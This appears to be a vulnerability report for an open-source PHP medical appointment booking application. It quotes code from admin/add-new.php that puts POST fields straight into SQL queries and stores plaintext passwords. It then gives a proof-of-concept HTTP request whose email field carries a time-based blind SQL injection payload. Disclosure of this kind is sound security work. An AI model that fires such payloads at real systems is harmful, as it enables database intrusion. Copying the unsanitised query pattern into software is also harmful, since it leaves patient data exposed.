This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
admin/add-new.php from line 47, The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 54 $result= $database->query("select * from webuser where email='$email';"); causes sql injection
if($_POST){
//print_r($_POST);
$result= $database->query("select * from webuser");
$name=$_POST['name'];
$nic=$_POST['nic'];
$spec=$_POST['spec'];
$email=$_POST['email'];
$tele=$_POST['Tele'];
$password=$_POST['password'];
$cpassword=$_POST['cpassword'];
if ($password==$cpassword){
$error='3';
$result= $database->query("select * from webuser where email='$email';");
if($result->num_rows==1){
$error='1';
}else{
$sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
$sql2="insert into webuser values('$email','d')";
$database->query($sql1);
$database->query($sql2);
//echo $sql1;
//echo $sql2;
$error= '4';
}
}else{
$error='2';
}
}else{
//header('location: signup.php');
$error='3';
}
poc
POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close
name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6
admin/add-new.php
from line 47, The $email parameter is controllable, the parameter email can be passed through post, and the $email is not protected from sql injection, line 54$result= $database->query("select * from webuser where email='$email';");
causes sql injectionpoc
Attack results pictures